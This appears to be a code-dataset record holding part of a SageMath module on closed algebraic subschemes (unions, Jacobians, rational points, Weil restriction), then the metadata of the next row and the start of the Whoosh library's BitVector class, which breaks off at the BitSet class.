We verify that the irrelevant ideal isn't accidently returned
(see :trac:`6920`)::
sage: PP.<x,y,z,w> = ProjectiveSpace(3,QQ)
sage: f = x^3 + y^3 + z^3 + w^3
sage: R = f.parent()
sage: I = [f] + [f.derivative(zz) for zz in PP.gens()]
sage: V = PP.subscheme(I)
sage: V.irreducible_components()
[
<BLANKLINE>
]
The same polynomial as above defines a scheme with a
nontrivial irreducible component in affine space (instead of
the empty scheme as above)::
sage: AA.<x,y,z,w> = AffineSpace(4,QQ)
sage: V = AA.subscheme(I)
sage: V.irreducible_components()
[
Closed subscheme of Affine Space of dimension 4 over Rational Field defined by:
w,
z,
y,
x
]
"""
try:
return self.__irreducible_components
except AttributeError:
pass
I = self.defining_ideal()
P = I.associated_primes()
if self.is_projective():
# In the projective case, we must exclude the prime ideals
# that contain the irrelevant ideal, which is the ideal
# generated by the variables, which are the gens of the
# base ring.
G = I.ring().gens()
# We make a list of ideals with the property that "any"
# of the elements of G are not in the ideal.
P = [J for J in P if any(g not in J for g in G)]
A = self.ambient_space()
C = Sequence([A.subscheme(X) for X in P], check=False, cr=True)
C.sort(key=lambda scheme: scheme.defining_ideal().gens())
C.set_immutable()
self.__irreducible_components = C
return C
def is_irreducible(self):
r"""
Return whether this subscheme is or is not irreducible.
OUTPUT: Boolean.
EXAMPLES::
sage: K = QuadraticField(-3)
sage: P.<x,y,z,w,t,u> = ProjectiveSpace(K, 5)
sage: X = P.subscheme([x*y - z^2 - K.0*t^2, t*w*x + y*z^2 - u^3])
sage: X.is_irreducible()
True
::
sage: P.<x,y,z> = ProjectiveSpace(QQ, 2)
sage: X = P.subscheme([(y + x - z)^2])
sage: X.is_irreducible()
False
::
sage: A.<x,y,z,w> = AffineSpace(GF(17), 4)
sage: X = A.subscheme([x*y*z^2 - x*y*z*w - z*w^2 + w^3, x^3*y*z*w - x*y^3*z - x^2*y*z*w \
- x^2*w^3 + y^2*w^2 + x*w^3])
sage: X.is_irreducible()
False
"""
return self.defining_ideal().is_prime()
def Jacobian_matrix(self):
r"""
Return the matrix `\frac{\partial f_i}{\partial x_j}` of
(formal) partial derivatives.
OUTPUT:
A matrix of polynomials.
EXAMPLES::
sage: P3.<w,x,y,z> = ProjectiveSpace(3, QQ)
sage: twisted_cubic = P3.subscheme(matrix([[w, x, y],[x, y, z]]).minors(2))
sage: twisted_cubic.Jacobian_matrix()
[ y -2*x w 0]
[ z -y -x w]
[ 0 z -2*y x]
This example addresses ticket :trac:`20512`::
sage: X = P3.subscheme([])
sage: X.Jacobian_matrix().base_ring() == P3.coordinate_ring()
True
"""
R = self.ambient_space().coordinate_ring()
l = self.defining_polynomials()
if len(l) == 0:
return sage.matrix.constructor.Matrix(R, 0)
return jacobian(l, R.gens())
def Jacobian(self):
r"""
Return the Jacobian ideal.
This is the ideal generated by
* the `d\times d` minors of the Jacobian matrix, where `d` is
the :meth:`codimension` of the algebraic scheme, and
* the defining polynomials of the algebraic scheme. Note that
some authors do not include these in the definition of the
Jacobian ideal. An example of a reference that does include
the defining equations is [Laz2004]_, p. 181.
OUTPUT:
An ideal in the coordinate ring of the ambient space.
EXAMPLES::
sage: P3.<w,x,y,z> = ProjectiveSpace(3, QQ)
sage: twisted_cubic = P3.subscheme(matrix([[w, x, y],[x, y, z]]).minors(2))
sage: twisted_cubic.Jacobian()
Ideal (-x^2 + w*y, -x*y + w*z, -y^2 + x*z, x*z, -2*w*z, w*y, 3*w*y, -2*w*x,
w^2, y*z, -2*x*z, w*z, 3*w*z, -2*w*y, w*x, z^2, -2*y*z, x*z, 3*x*z, -2*w*z,
w*y) of Multivariate Polynomial Ring in w, x, y, z over Rational Field
sage: twisted_cubic.defining_ideal()
Ideal (-x^2 + w*y, -x*y + w*z, -y^2 + x*z) of Multivariate Polynomial Ring
in w, x, y, z over Rational Field
This example addresses ticket :trac:`20512`::
sage: X = P3.subscheme([])
sage: X.Jacobian() == P3.coordinate_ring().unit_ideal()
True
"""
d = self.codimension()
minors = self.Jacobian_matrix().minors(d)
I = self.defining_ideal()
minors = tuple([ I.reduce(m) for m in minors ])
return I.ring().ideal(I.gens() + minors)
def reduce(self):
r"""
Return the corresponding reduced algebraic space associated to this
scheme.
EXAMPLES: First we construct the union of a doubled and tripled
line in the affine plane over `\QQ` ::
sage: A.<x,y> = AffineSpace(2, QQ)
sage: X = A.subscheme([(x-1)^2*(x-y)^3]); X
Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
x^5 - 3*x^4*y + 3*x^3*y^2 - x^2*y^3 - 2*x^4 + 6*x^3*y
- 6*x^2*y^2 + 2*x*y^3 + x^3 - 3*x^2*y + 3*x*y^2 - y^3
sage: X.dimension()
1
Then we compute the corresponding reduced scheme::
sage: Y = X.reduce(); Y
Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
x^2 - x*y - x + y
Finally, we verify that the reduced scheme `Y` is the union
of those two lines::
sage: L1 = A.subscheme([x-1]); L1
Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
x - 1
sage: L2 = A.subscheme([x-y]); L2
Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
x - y
sage: W = L1.union(L2); W # taken in ambient space
Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
x^2 - x*y - x + y
sage: Y == W
True
"""
try:
return self._reduce
except AttributeError:
r = self.defining_ideal().radical()
A = self.ambient_space()
V = A.subscheme(r)
V._reduce = V # so knows it is already reduced!
self._reduce = V
return V
def union(self, other):
"""
Return the scheme-theoretic union of self and other in their common
ambient space.
EXAMPLES: We construct the union of a line and a tripled-point on
the line.
::
sage: A.<x,y> = AffineSpace(2, QQ)
sage: I = ideal([x,y])^3
sage: P = A.subscheme(I)
sage: L = A.subscheme([y-1])
sage: S = L.union(P); S
Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
y^4 - y^3,
x*y^3 - x*y^2,
x^2*y^2 - x^2*y,
x^3*y - x^3
sage: S.dimension()
1
sage: S.reduce()
Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
y^2 - y,
x*y - x
We can also use the notation "+" for the union::
sage: A.subscheme([x]) + A.subscheme([y^2 - (x^3+1)])
Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
x^4 - x*y^2 + x
Saving and loading::
sage: loads(S.dumps()) == S
True
"""
if not isinstance(other, AlgebraicScheme_subscheme):
raise TypeError("other (=%s) must be a closed algebraic subscheme of an ambient space"%other)
A = self.ambient_space()
if other.ambient_space() != A:
raise ValueError("other (=%s) must be in the same ambient space as self"%other)
return A.subscheme(self.defining_ideal().intersection(other.defining_ideal()))
def __pow__(self, m):
"""
Return the Cartesian power of this space.
INPUT: ``m`` -- integer.
OUTPUT: subscheme of product of ambient spaces.
EXAMPLES::
sage: P2.<y0,y1,y2> = ProjectiveSpace(ZZ, 2)
sage: Z = P2.subscheme([y0^2 - y1*y2, y2])
sage: Z**3
Closed subscheme of Product of projective spaces P^2 x P^2 x P^2 over
Integer Ring defined by:
x0^2 - x1*x2,
x2,
x3^2 - x4*x5,
x5,
x6^2 - x7*x8,
x8
::
sage: A2.<x,y> = AffineSpace(QQ, 2)
sage: V = A2.subscheme([x^2-y, x-1])
sage: V**4
Closed subscheme of Affine Space of dimension 8 over Rational Field
defined by:
x0^2 - x1,
x0 - 1,
x2^2 - x3,
x2 - 1,
x4^2 - x5,
x4 - 1,
x6^2 - x7,
x6 - 1
::
sage: T.<x0,x1,x2,x3,x4,x5> = ProductProjectiveSpaces([2,2], ZZ)
sage: X = T.subscheme([x0*x4 - x1*x3])
sage: X^2
Closed subscheme of Product of projective spaces P^2 x P^2 x P^2 x P^2
over Integer Ring defined by:
-x1*x3 + x0*x4,
-x7*x9 + x6*x10
::
sage: E = EllipticCurve([0,0,0,0,1])
sage: E^2
Closed subscheme of Product of projective spaces P^2 x P^2 over Rational
Field defined by:
-x0^3 + x1^2*x2 - x2^3,
-x3^3 + x4^2*x5 - x5^3
"""
AS = self.ambient_space().__pow__(m)
CR = AS.coordinate_ring()
n = self.ambient_space().coordinate_ring().ngens()
polys = []
for i in range(m):
phi = self.ambient_space().coordinate_ring().hom(list(CR.gens()[n*i : n*(i+1)]), CR)
polys.extend([phi(t) for t in self.defining_polynomials()])
return AS.subscheme(polys)
def __mul__(self, right):
r"""
Create the product of subschemes.
INPUT: ``right`` - a subscheme of similar type.
OUTPUT: a subscheme of a the product of the ambient spaces.
EXAMPLES::
sage: S = ProductProjectiveSpaces([1,2,1], ZZ, 't')
sage: T = ProductProjectiveSpaces([2,2], ZZ, 'x')
sage: T.inject_variables()
Defining x0, x1, x2, x3, x4, x5
sage: X = T.subscheme([x0*x4 - x1*x3])
sage: X*S
Closed subscheme of Product of projective spaces P^2 x P^2 x P^1 x P^2 x
P^1 over Integer Ring defined by:
-x1*x3 + x0*x4
::
sage: S = ProjectiveSpace(ZZ, 2, 't')
sage: T.<x0,x1,x2,x3> = ProjectiveSpace(ZZ, 3)
sage: X = T.subscheme([x0*x2 - x1*x3])
sage: X*S
Closed subscheme of Product of projective spaces P^3 x P^2
over Integer Ring defined by:
x0*x2 - x1*x3
::
sage: A2 = AffineSpace(ZZ, 2, 't')
sage: A3.<x0,x1,x2> = AffineSpace(ZZ, 3)
sage: X = A3.subscheme([x0*x2 - x1])
sage: X*A2
Closed subscheme of Affine Space of dimension 5 over Integer Ring
defined by:
x0*x2 - x1
::
sage: T.<x0,x1,x2,x3,x4,x5> = ProductProjectiveSpaces([2,2], ZZ)
sage: X = T.subscheme([x0*x4 - x1*x3])
sage: X*X
Closed subscheme of Product of projective spaces P^2 x P^2 x P^2 x P^2
over Integer Ring defined by:
-x1*x3 + x0*x4,
-x7*x9 + x6*x10
::
sage: P1.<z0,z1> = ProjectiveSpace(ZZ, 1)
sage: Y = P1.subscheme([z0 - z1])
sage: T.<x0,x1,x2,x3,x4,x5> = ProductProjectiveSpaces([2,2], ZZ)
sage: X = T.subscheme([x0*x4 - x1*x3])
sage: X*Y
Closed subscheme of Product of projective spaces P^2 x P^2 x P^1 over
Integer Ring defined by:
-x1*x3 + x0*x4,
z0 - z1
::
sage: A3.<x0,x1,x2> = AffineSpace(ZZ, 3)
sage: X = A3.subscheme([x0*x2 - x1])
sage: P1.<u,v>=ProjectiveSpace(ZZ,1)
sage: Y = P1.subscheme([u-v])
sage: X*Y
Traceback (most recent call last):
...
TypeError: Projective Space of dimension 1 over Integer Ring must be an affine space or affine subscheme
sage: Y*X
Traceback (most recent call last):
...
TypeError: Affine Space of dimension 3 over Integer Ring must be a projective space, product of projective spaces, or subscheme
sage: PP.<a,b,c,d>=ProductProjectiveSpaces(ZZ, [1,1])
sage: Z = PP.subscheme([a*d-b*c])
sage: X*Z
Traceback (most recent call last):
...
TypeError: Product of projective spaces P^1 x P^1 over Integer Ring must be an affine space or affine subscheme
sage: Z*X
Traceback (most recent call last):
...
TypeError: Affine Space of dimension 3 over Integer Ring must be a projective space, product of projective spaces, or subscheme
"""
#This will catch any ambient space mismatches
AS = self.ambient_space()*right.ambient_space()
CR = AS.coordinate_ring()
n = self.ambient_space().coordinate_ring().ngens()
phi = self.ambient_space().coordinate_ring().hom(list(CR.gens()[:n]), CR)
psi = right.ambient_space().coordinate_ring().hom(list(CR.gens()[n:]), CR)
return AS.subscheme([phi(t) for t in self.defining_polynomials()] + [psi(t) for t in right.defining_polynomials()])
__add__ = union
def intersection(self, other):
"""
Return the scheme-theoretic intersection of self and other in their
common ambient space.
EXAMPLES::
sage: A.<x, y> = AffineSpace(2, ZZ)
sage: X = A.subscheme([x^2-y])
sage: Y = A.subscheme([y])
sage: X.intersection(Y)
Closed subscheme of Affine Space of dimension 2 over Integer Ring defined by:
x^2 - y,
y
"""
if not isinstance(other, AlgebraicScheme_subscheme):
raise TypeError("other (=%s) must be a closed algebraic subscheme of an ambient space"%other)
A = self.ambient_space()
if other.ambient_space() != A:
raise ValueError("other (=%s) must be in the same ambient space as self"%other)
return A.subscheme(self.defining_ideal() + other.defining_ideal())
def complement(self, other=None):
"""
Return the scheme-theoretic complement other - self, where
self and other are both closed algebraic subschemes of the
same ambient space.
If other is unspecified, it is taken to be the ambient space
of self.
EXAMPLES::
sage: A.<x, y, z> = AffineSpace(3, ZZ)
sage: X = A.subscheme([x+y-z])
sage: Y = A.subscheme([x-y+z])
sage: Y.complement(X)
Quasi-affine subscheme X - Y of Affine Space of
dimension 3 over Integer Ring, where X is defined by:
x + y - z
and Y is defined by:
x - y + z
sage: Y.complement()
Quasi-affine subscheme X - Y of Affine Space of
dimension 3 over Integer Ring, where X is defined by:
(no polynomials)
and Y is defined by:
x - y + z
sage: P.<x, y, z> = ProjectiveSpace(2, QQ)
sage: X = P.subscheme([x^2+y^2+z^2])
sage: Y = P.subscheme([x*y+y*z+z*x])
sage: Y.complement(X)
Quasi-projective subscheme X - Y of Projective Space of
dimension 2 over Rational Field, where X is defined by:
x^2 + y^2 + z^2
and Y is defined by:
x*y + x*z + y*z
sage: Y.complement(P)
Quasi-projective subscheme X - Y of Projective Space of
dimension 2 over Rational Field, where X is defined by:
(no polynomials)
and Y is defined by:
x*y + x*z + y*z
"""
A = self.ambient_space()
if other is None:
other = A.subscheme([])
elif not isinstance(other, AlgebraicScheme_subscheme):
if other == A:
other = A.subscheme([])
else:
raise TypeError("Argument other (=%s) must be a closed algebraic subscheme of an ambient space"%other)
if other.ambient_space() != A:
raise ValueError("other (=%s) must be in the same ambient space as self"%other)
return AlgebraicScheme_quasi(other, self)
def rational_points(self, **kwds):
"""
Return the rational points on the algebraic subscheme.
For a dimension 0 subscheme, if the base ring is a numerical field
such as the ComplexField the results returned could be very far from correct.
If the polynomials defining the subscheme are defined over a number field, you
will get better results calling rational points with `F` defined as the number
field and the base ring as the field of definition. If the base ring
is a number field, the embedding into ``F`` must be known.
In the case of numerically approximated points, the points are returned over as
points of the ambient space.
INPUT:
kwds:
- ``bound`` - integer (optional, default=0). The bound for the coordinates for
subschemes with dimension at least 1.
- ``prec`` - integer (optional, default=53). The precision to use to
compute the elements of bounded height for number fields.
- ``F`` - field (optional, default=base ring). The field to compute
the rational points over.
- ``point_tolerance`` - positive real number (optional, default=10^(-10)).
For numerically inexact fields, two points are considered the same
if their coordinates are within tolerance.
- ``zero_tolerance`` - positive real number (optional, default=10^(-10)).
For numerically inexact fields, points are on the subscheme if they
satisfy the equations to within tolerance.
- ``tolerance`` - a rational number in (0,1] used in doyle-krumm algorithm-4
OUTPUT: list of points in subscheme or ambient space
.. WARNING::
For numerically inexact fields such as ComplexField or RealField the
list of points returned is very likely to be incomplete at best.
EXAMPLES:
Enumerate over a projective scheme over a number field::
sage: u = QQ['u'].0
sage: K.<v> = NumberField(u^2 + 3)
sage: A.<x,y> = ProjectiveSpace(K,1)
sage: X=A.subscheme(x^2 - y^2)
sage: X.rational_points(bound=3)
[(-1 : 1), (1 : 1)]
One can enumerate points up to a given bound on a projective scheme
over the rationals::
sage: E = EllipticCurve('37a')
sage: E.rational_points(bound=8)
[(-1 : -1 : 1), (-1 : 0 : 1), (0 : -1 : 1), (0 : 0 : 1), (0 : 1 : 0), (1/4 : -5/8 : 1),
(1/4 : -3/8 : 1), (1 : -1 : 1), (1 : 0 : 1), (2 : -3 : 1), (2 : 2 : 1)]
For a small finite field, the complete set of points can be
enumerated. ::
sage: Etilde = E.base_extend(GF(3))
sage: Etilde.rational_points()
[(0 : 0 : 1), (0 : 1 : 0), (0 : 2 : 1), (1 : 0 : 1),
(1 : 2 : 1), (2 : 0 : 1), (2 : 2 : 1)]
The class of hyperelliptic curves does not (yet) support
desingularization of the places at infinity into two points::
sage: FF = FiniteField(7)
sage: P.<x> = PolynomialRing(FiniteField(7))
sage: C = HyperellipticCurve(x^8+x+1)
sage: C.rational_points()
[(0 : 1 : 0), (0 : 1 : 1), (0 : 6 : 1), (2 : 0 : 1),
(4 : 0 : 1), (6 : 1 : 1), (6 : 6 : 1)]
::
sage: K.<v> = QuadraticField(-3)
sage: P.<x,y,z> = ProjectiveSpace(K, 2)
sage: X = P.subscheme([x^2 - v^2*x*z, y*x-v*z^2])
sage: X.rational_points(F=CC)
[(-3.00000000000000 : -0.577350269189626*I : 1.00000000000000),
(0.000000000000000 : 1.00000000000000 : 0.000000000000000)]
::
sage: K.<v> = QuadraticField(3)
sage: A.<x,y> = AffineSpace(K, 2)
sage: X = A.subscheme([x^2 - v^2*y, y*x-v])
sage: X.rational_points(F=RR)
[(1.73205080756888, 1.00000000000000)]
.. TODO::
Implement Stoll's model in weighted projective space to
resolve singularities and find two points (1 : 1 : 0) and
(-1 : 1 : 0) at infinity.
"""
F = kwds.pop('F', None)
if F is None: #sometimes None is passed in
F = self.base_ring()
if F in NumberFields() or F == ZZ:
X = self.base_extend(F)(F)
try:
return X.points(**kwds) # checks for proper bound done in points functions
except TypeError:
raise TypeError("Unable to enumerate points over %s."%F)
elif (self.base_ring() in NumberFields() or self.base_ring() == ZZ)\
and hasattr(F, 'precision'):
#we are numerically approximating number field points
return self(self.base_ring()).numerical_points(F=F, **kwds)
try:
X = self.base_extend(F)(F)
return X.points()
except TypeError:
raise TypeError("Unable to enumerate points over %s."%F)
def change_ring(self, R):
r"""
Returns a new algebraic subscheme which is this subscheme coerced to ``R``.
INPUT:
- ``R`` -- ring or morphism.
OUTPUT:
- A new algebraic subscheme which is this subscheme coerced to ``R``.
EXAMPLES::
sage: P.<x,y> = ProjectiveSpace(QQ, 1)
sage: X = P.subscheme([3*x^2-y^2])
sage: H = Hom(X,X)
sage: X.change_ring(GF(3))
Closed subscheme of Projective Space of dimension 1 over Finite Field of size 3 defined by:
-y^2
::
sage: K.<w> = QuadraticField(2)
sage: R.<z> = K[]
sage: L.<v> = K.extension(z^3-5)
sage: P.<x,y> = ProjectiveSpace(K, 1)
sage: X = P.subscheme(x - w*y)
sage: X.change_ring(L)
Closed subscheme of Projective Space of dimension 1 over Number Field in v with
defining polynomial z^3 - 5 over its base field defined by:
x + (-w)*y
::
sage: K.<w> = QuadraticField(2)
sage: R.<z> = K[]
sage: L.<v> = K.extension(z^3-5)
sage: P.<x,y,z> = AffineSpace(L,3)
sage: X = P.subscheme([x-w*y, z^2-v*x])
sage: emb = L.embeddings(QQbar)
sage: X.change_ring(emb[0])
Closed subscheme of Affine Space of dimension 3 over Algebraic Field
defined by:
x + (-1.414213562373095? + 0.?e-16*I)*y,
z^2 + (0.8549879733383485? + 1.480882609682365?*I)*x
::
sage: K.<w> = QuadraticField(2)
sage: R.<z> = K[]
sage: L.<v> = K.extension(z^3-5)
sage: P.<x,y,z> = AffineSpace(L,3)
sage: X = P.subscheme([x-w*y, z^2-v*x])
sage: emb = L.embeddings(QQbar)
sage: X.change_ring(emb[1])
Closed subscheme of Affine Space of dimension 3 over Algebraic Field
defined by:
x + (-1.414213562373095? + 0.?e-16*I)*y,
z^2 + (0.8549879733383485? - 1.480882609682365?*I)*x
::
sage: K.<w> = QuadraticField(-3)
sage: P.<x,y> = ProjectiveSpace(K, 1)
sage: X = P.subscheme(x-w*y)
sage: X.change_ring(CC)
Closed subscheme of Projective Space of dimension 1 over Complex Field
with 53 bits of precision defined by:
x + (-1.73205080756888*I)*y
::
sage: K.<w> = QuadraticField(3)
sage: P.<x,y> = ProjectiveSpace(K,1)
sage: X = P.subscheme(x-w*y)
sage: X.change_ring(RR)
Closed subscheme of Projective Space of dimension 1 over Real Field
with 53 bits of precision defined by:
x - 1.73205080756888*y
::
sage: K.<v> = CyclotomicField(7)
sage: O = K.maximal_order()
sage: P.<x,y> = ProjectiveSpace(O, 1)
sage: X = P.subscheme([x^2+O(v)*y^2])
sage: X.change_ring(CC)
Closed subscheme of Projective Space of dimension 1 over Complex Field
with 53 bits of precision defined by:
x^2 + (0.623489801858734 + 0.781831482468030*I)*y^2
sage: X.change_ring(K).change_ring(K.embeddings(QQbar)[0])
Closed subscheme of Projective Space of dimension 1 over Algebraic Field defined by:
x^2 + (-0.9009688679024191? - 0.4338837391175581?*I)*y^2
::
sage: R.<x> = QQ[]
sage: f = x^6-2
sage: L.<b> = NumberField(f, embedding=f.roots(CC)[2][0])
sage: A.<x,y> = AffineSpace(L, 2)
sage: H = Hom(A,A)
sage: X = A.subscheme([b*x^2, y^2])
sage: X.change_ring(CC)
Closed subscheme of Affine Space of dimension 2 over Complex Field with
53 bits of precision defined by:
(-0.561231024154687 - 0.972080648619833*I)*x^2,
y^2
"""
AS = self.ambient_space()
new_AS = AS.change_ring(R)
I = [f.change_ring(R) for f in self.defining_polynomials()]
return new_AS.subscheme(I)
def weil_restriction(self):
r"""
Compute the Weil restriction of this variety over some extension
field. If the field is a finite field, then this computes
the Weil restriction to the prime subfield.
A Weil restriction of scalars - denoted `Res_{L/k}` - is a
functor which, for any finite extension of fields `L/k` and
any algebraic variety `X` over `L`, produces another
corresponding variety `Res_{L/k}(X)`, defined over `k`. It is
useful for reducing questions about varieties over large
fields to questions about more complicated varieties over
smaller fields.
This function does not compute this Weil restriction directly
but computes on generating sets of polynomial ideals:
Let `d` be the degree of the field extension `L/k`, let `a` a
generator of `L/k` and `p` the minimal polynomial of
`L/k`. Denote this ideal by `I`.
Specifically, this function first maps each variable `x` to
its representation over `k`: `\sum_{i=0}^{d-1} a^i x_i`. Then
each generator of `I` is evaluated over these representations
and reduced modulo the minimal polynomial `p`. The result is
interpreted as a univariate polynomial in `a` and its
coefficients are the new generators of the returned ideal.
If the input and the output ideals are radical, this is
equivalent to the statement about algebraic varieties above.
OUTPUT: Affine subscheme - the Weil restriction of ``self``.
EXAMPLES::
sage: R.<x> = QQ[]
sage: K.<w> = NumberField(x^5-2)
sage: R.<x> = K[]
sage: L.<v> = K.extension(x^2+1)
sage: A.<x,y> = AffineSpace(L,2)
sage: X = A.subscheme([y^2-L(w)*x^3-v])
sage: X.weil_restriction()
Closed subscheme of Affine Space of dimension 4 over Number Field in w
with defining polynomial x^5 - 2 defined by:
(-w)*z0^3 + (3*w)*z0*z1^2 + z2^2 - z3^2,
(-3*w)*z0^2*z1 + (w)*z1^3 + 2*z2*z3 - 1
sage: X.weil_restriction().ambient_space() is A.weil_restriction()
True
::
sage: A.<x,y,z> = AffineSpace(GF(5^2,'t'),3)
sage: X = A.subscheme([y^2-x*z, z^2+2*y])
sage: X.weil_restriction()
Closed subscheme of Affine Space of dimension 6 over Finite Field of
size 5 defined by:
z2^2 - 2*z3^2 - z0*z4 + 2*z1*z5,
2*z2*z3 + z3^2 - z1*z4 - z0*z5 - z1*z5,
z4^2 - 2*z5^2 + 2*z2,
2*z4*z5 + z5^2 + 2*z3
"""
try:
X = self.__weil_restriction
except AttributeError:
L = self.base_ring()
if L.is_finite():
d = L.degree()
else:
d = L.relative_degree()
if d == 1:
X = self
else:
A = self.ambient_space().weil_restriction()
I = self.defining_ideal().weil_restriction()
X = A.subscheme(I)
self.__weil_restriction = X
return X
def specialization(self, D=None, phi=None):
r"""
Specialization of this subscheme.
Given a family of maps defined over a polynomial ring. A specialization
is a particular member of that family. The specialization can be specified either
by a dictionary or a :class:`SpecializationMorphism`.
INPUT:
- ``D`` -- dictionary (optional)
- ``phi`` -- SpecializationMorphism (optional)
OUTPUT: :class:`SchemeMorphism_polynomial`
EXAMPLES::
sage: R.<c> = PolynomialRing(QQ)
sage: P.<x,y> = ProjectiveSpace(R, 1)
sage: X = P.subscheme([x^2 + c*y^2])
sage: X.specialization(dict({c:2}))
Closed subscheme of Projective Space of dimension 1 over Rational Field defined by:
x^2 + 2*y^2
::
sage: R.<c> = PolynomialRing(QQ)
sage: S.<a,b> = R[]
sage: P.<x,y,z> = AffineSpace(S,3)
sage: X = P.subscheme([x^2+a*c*y^2 - b*z^2])
sage: from sage.rings.polynomial.flatten import SpecializationMorphism
sage: phi = SpecializationMorphism(P.coordinate_ring(),dict({c:2,a:1}))
sage: X.specialization(phi=phi)
Closed subscheme of Affine Space of dimension 3 over Univariate Polynomial Ring in b over Rational Field defined by:
x^2 + 2*y^2 + (-b)*z^2
"""
if D is None:
if phi is None:
raise ValueError("either the dictionary or the specialization must be provided")
else:
from sage.rings.polynomial.flatten import SpecializationMorphism
phi = SpecializationMorphism(self.ambient_space().coordinate_ring(),D)
amb = self.ambient_space().change_ring(phi.codomain().base_ring())
return amb.subscheme([phi(g) for g in self.defining_polynomials()])
| 37.067731 | 174 | 0.553205 |
4a1b5eba9d064981f56ad861ceea7e885d37d92f
| 8,276 |
py
|
Python
|
lib/whoosh/support/bitvector.py
|
ckolumbus/WikidPad.svn
|
8f03c1105a8144c9a82e392ab7f32e263c533775
|
[
"Apache-2.0"
] | 2 |
2019-02-24T08:53:20.000Z
|
2019-09-25T02:11:17.000Z
|
lib/whoosh/support/bitvector.py
|
ckolumbus/WikidPad.svn
|
8f03c1105a8144c9a82e392ab7f32e263c533775
|
[
"Apache-2.0"
] | null | null | null |
lib/whoosh/support/bitvector.py
|
ckolumbus/WikidPad.svn
|
8f03c1105a8144c9a82e392ab7f32e263c533775
|
[
"Apache-2.0"
] | null | null | null |
"""
An implementation of an object that acts like a collection of on/off bits.
"""
import operator
from array import array
#: Table of the number of '1' bits in each byte (0-255)
BYTE_COUNTS = array('B', [
0, 1, 1, 2, 1, 2, 2, 3, 1, 2, 2, 3, 2, 3, 3, 4,
1, 2, 2, 3, 2, 3, 3, 4, 2, 3, 3, 4, 3, 4, 4, 5,
1, 2, 2, 3, 2, 3, 3, 4, 2, 3, 3, 4, 3, 4, 4, 5,
2, 3, 3, 4, 3, 4, 4, 5, 3, 4, 4, 5, 4, 5, 5, 6,
1, 2, 2, 3, 2, 3, 3, 4, 2, 3, 3, 4, 3, 4, 4, 5,
2, 3, 3, 4, 3, 4, 4, 5, 3, 4, 4, 5, 4, 5, 5, 6,
2, 3, 3, 4, 3, 4, 4, 5, 3, 4, 4, 5, 4, 5, 5, 6,
3, 4, 4, 5, 4, 5, 5, 6, 4, 5, 5, 6, 5, 6, 6, 7,
1, 2, 2, 3, 2, 3, 3, 4, 2, 3, 3, 4, 3, 4, 4, 5,
2, 3, 3, 4, 3, 4, 4, 5, 3, 4, 4, 5, 4, 5, 5, 6,
2, 3, 3, 4, 3, 4, 4, 5, 3, 4, 4, 5, 4, 5, 5, 6,
3, 4, 4, 5, 4, 5, 5, 6, 4, 5, 5, 6, 5, 6, 6, 7,
2, 3, 3, 4, 3, 4, 4, 5, 3, 4, 4, 5, 4, 5, 5, 6,
3, 4, 4, 5, 4, 5, 5, 6, 4, 5, 5, 6, 5, 6, 6, 7,
3, 4, 4, 5, 4, 5, 5, 6, 4, 5, 5, 6, 5, 6, 6, 7,
4, 5, 5, 6, 5, 6, 6, 7, 5, 6, 6, 7, 6, 7, 7, 8])
class BitVector(object):
"""
Implements a memory-efficient array of bits.
>>> bv = BitVector(10)
>>> bv
<BitVector 0000000000>
>>> bv[5] = True
>>> bv
<BitVector 0000010000>
You can initialize the BitVector using an iterable of integers representing bit
positions to turn on.
>>> bv2 = BitVector(10, [2, 4, 7])
>>> bv2
<BitVector 00101001000>
>>> bv[2]
True
BitVector supports bit-wise logic operations & (and), | (or), and ^ (xor)
between itself and another BitVector of equal size, or itself and a collection of
integers (usually a set() or frozenset()).
>>> bv | bv2
<BitVector 00101101000>
Note that ``BitVector.__len__()`` returns the number of "on" bits, not
the size of the bit array. This is to make BitVector interchangeable with
a set()/frozenset() of integers. To get the size, use BitVector.size.
"""
def __init__(self, size, source=None, bits=None):
self.size = size
if bits:
self.bits = bits
else:
self.bits = array("B", ([0x00] * ((size >> 3) + 1)))
if source:
set = self.set
for num in source:
set(num)
self.bcount = None
def __eq__(self, other):
if isinstance(other, BitVector):
return self.bits == other.bits
return False
def __repr__(self):
return "<BitVector %s/%s>" % (len(self), self.size)
def __len__(self):
# This returns the count of "on" bits instead of the size to
# make BitVector exchangeable with a set() object.
return self.count()
def __contains__(self, index):
return self[index]
def __iter__(self):
get = self.__getitem__
for i in xrange(0, self.size):
if get(i):
yield i
def __str__(self):
get = self.__getitem__
return "".join("1" if get(i) else "0"
for i in xrange(0, self.size))
def __nonzero__(self):
return self.count() > 0
def __getitem__(self, index):
return self.bits[index >> 3] & (1 << (index & 7)) != 0
def __setitem__(self, index, value):
if value:
self.set(index)
else:
self.clear(index)
def _logic(self, op, bitv):
if self.size != bitv.size:
raise ValueError("Can't combine bitvectors of different sizes")
res = BitVector(size=self.size)
lpb = map(op, self.bits, bitv.bits)
res.bits = array('B', lpb)
return res
def union(self, other):
return self.__or__(other)
def intersection(self, other):
return self.__and__(other)
def __and__(self, other):
if not isinstance(other, BitVector):
other = BitVector(self.size, source=other)
return self._logic(operator.__and__, other)
def __or__(self, other):
if not isinstance(other, BitVector):
other = BitVector(self.size, source=other)
return self._logic(operator.__or__, other)
def __ror__(self, other):
return self.__or__(other)
def __rand__(self, other):
return self.__and__(other)
def __xor__(self, other):
if not isinstance(other, BitVector):
other = BitVector(self.size, source=other)
return self._logic(operator.__xor__, other)
def __invert__(self):
return BitVector(self.size, source=(x for x in xrange(self.size) if x not in self))
def count(self):
"""Returns the number of "on" bits in the bit array."""
if self.bcount is None:
self.bcount = sum(BYTE_COUNTS[b & 0xFF] for b in self.bits)
return self.bcount
def set(self, index):
"""Turns the bit at the given position on."""
if index >= self.size:
raise IndexError("Position %s greater than the size of the vector" % repr(index))
self.bits[index >> 3] |= 1 << (index & 7)
self.bcount = None
def clear(self, index):
"""Turns the bit at the given position off."""
self.bits[index >> 3] &= ~(1 << (index & 7))
self.bcount = None
def set_from(self, iterable):
"""Takes an iterable of integers representing positions, and turns
on the bits at those positions.
"""
set = self.set
for index in iterable:
set(index)
def copy(self):
"""Returns a copy of this BitArray."""
return BitVector(self.size, bits=self.bits)
class BitSet(object):
"""A set-like object for holding positive integers. It is dynamically
